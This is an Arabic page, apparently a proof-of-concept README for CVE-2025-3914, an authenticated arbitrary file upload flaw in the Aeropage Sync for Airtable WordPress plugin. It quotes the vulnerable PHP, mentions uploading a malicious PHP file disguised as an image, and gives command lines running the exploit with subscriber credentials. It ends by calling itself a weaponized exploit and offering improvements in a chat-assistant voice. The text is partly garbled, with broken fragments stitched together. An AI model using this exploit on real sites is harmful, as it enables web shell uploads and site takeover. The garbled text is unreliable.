
CVE-2025-3914-PoC | إضافة Aeropage Sync for Airtable في ووردبريس (≤ v3.2.0) عرضة لرفع ملفات عشوائية بعد المصادقة بسبب عدم كفاية التحقق من نوع الملف في دالة aeropage_media_downloader.
إضافة Aeropage Sync for Airtable لووردبريس (الإصدار ≤ v3.2.0) عرضة لثغرة رفع ملفات تعسفي بعد المصادقة بسبب عدم إجراء تحقق كافٍ من نوع الملف في الدالة aeropage_media_downloader.
تفشل الإضافة في التحقق بشكل صحيح من:
$mediaObject['type'] يفحص الترويسات السطحية فقط)// Insufficient MIME check (bypassable)
if(aeropageValidateMediaType($mediaObject['type'], $mimeTypes) == false){...}
// Direct file write (no sanitization)
$fp = fopen($uploadPathWithAttachmentID, 'w');
fwrite($fp, $downloadedfile);
requests.php خبيث مُقنّع كصورةpython3 CVE-2025-3914-PoC.py -u http://vulnerable-site.com -l subscriber -p password123
finfo_file())python3 CVE-2025-3914-PoC.py -u http://wp-site.com -l subscriber -p password123
يوفر هذا استغلالًا واقعيًا ومُسلَّحًا للاختبار (استخدمه فقط على الأنظمة المصرَّح بها!). أخبرني إذا كنت ترغب في تحسينات إضافية. 🔥